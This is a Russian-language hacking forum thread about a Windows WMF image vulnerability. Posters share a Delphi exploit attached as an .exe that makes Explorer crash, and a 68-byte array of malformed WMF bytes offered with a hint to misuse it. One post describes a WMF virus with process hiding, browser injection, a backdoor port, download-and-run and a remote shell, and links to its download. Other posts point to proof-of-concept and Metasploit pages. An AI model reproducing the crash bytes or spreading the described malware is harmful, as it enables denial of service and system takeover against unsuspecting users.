Решил заюзать баг найденый Orbital'ом.
Прога генерирует специальный файл с расширением *.wmf,
если попробовать просмотреть папку с данным файлом, то
експлорер вылетает в ...
Написана в Delphi на чистом API.



fa9e_18.01.2007_CRACKLAB.rU.tgz - win_exploit.exe

-----
xchg dword [eax], eax

| Сообщение посчитали полезным:

Ну и кому оно надо то?
Понимаю еслиб выполнить код смог бы, а так в топку. На перле лучше и нагляднее.
www.securitylab.ru/poc/extra/286847.php

А еще лучше вот это
www.securitylab.ru/vulnerability/243581.php

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

баян и без сорсов

>>Несложный WMF-вирус, который инфектит графические файлы разных форматов кодом, который используя WMF-уязвимость распаковывает и запускает свой бинарник. Использованы некоторые стелс-механизмы: инжект в дефолтный браузер, скрытие процесса, путём патчинга двусвязного списка EPROCESS. После запуска вирус биндит порт законнектившись на который можно отдать комманду на скачивание и запуск произвольного файла, или запстить remote-shell. Для усложнения жизни евристическим анализаторам, API-ф-ции импортируются и вызываются по хэшу.

http://allmyhate.host.sk/xwmf_.rar http://allmyhate.host.sk/xwmf_.rar

-----
HOW MUCH BLOOD WOULD YOU SHED TO STAY ALIVE

| Сообщение посчитали полезным:

To [HEX]:
Sorry, на секлабе я этот перловый скрипт не видел!
Шелкод намного больше моего.

To ProTeuS:
держи код, что с ним делать думаю догадаешся

shellcode: array[0..67] of byte = (
$01, $00, $09, $00, $00, $03, $22, $00, $00, $00, $63, $79, $61, $6E, $69, $64,
$2D, $45, $07, $00, $00, $00, $FC, $02, $00, $00, $00, $00, $00, $00, $00, $00,
$08, $00, $00, $00, $FA, $02, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$07, $00, $00, $00, $FC, $02, $08, $00, $00, $00, $00, $00, $00, $80, $03, $00,
$00, $00, $00, $00);

-----
xchg dword [eax], eax

| Сообщение посчитали полезным:

это НЕ шеллкод, т.к. полезной нагрузки в DoS быть НЕ может

-----
HOW MUCH BLOOD WOULD YOU SHED TO STAY ALIVE

| Сообщение посчитали полезным:

Если ты заметил, то shellcode - это имя массива.

-----
xchg dword [eax], eax

| Сообщение посчитали полезным:

www.securitylab.ru/poc/extra/286847.php
>>Шелкод намного больше моего

и тут тоже?

-----
HOW MUCH BLOOD WOULD YOU SHED TO STAY ALIVE

| Сообщение посчитали полезным:

ладн, кому было нуЖно, все полезное с топика уже по4ерпнули

-----
HOW MUCH BLOOD WOULD YOU SHED TO STAY ALIVE

| Сообщение посчитали полезным:

Шеллкод потом замучу, щас пока другим занят.

-----
xchg dword [eax], eax

| Сообщение посчитали полезным:

v0id2k
Че мутить то когда и так уже все замучено

ссыль на метасплойтовский модуль был дан. юзай кому надо.

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

[HEX]
Я хочу на Делфях это дело написать.

-----
xchg dword [eax], eax

| Сообщение посчитали полезным:

и будешь ты юзать только под виндой эту бодягу! Уж лучше писать на кросплотформенных языках.

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

To [HEX]
Ты прав, хотя я это писал не для широких масс, а так, для себя.

-----
xchg dword [eax], eax

| Сообщение посчитали полезным:

v0id2k пишет:
Ты прав, хотя я это писал не для широких масс, а так, для себя.
Отлично, будет код на Delphi, дай сорсы, буду благодарен.

| Сообщение посчитали полезным:

Тему предлагаю закрыть, вопросов тут, вроде, никаких нет. Уязвимость сама по себе уже древнющая да и выложены уже файлы, флуд только идёт.

| Сообщение посчитали полезным: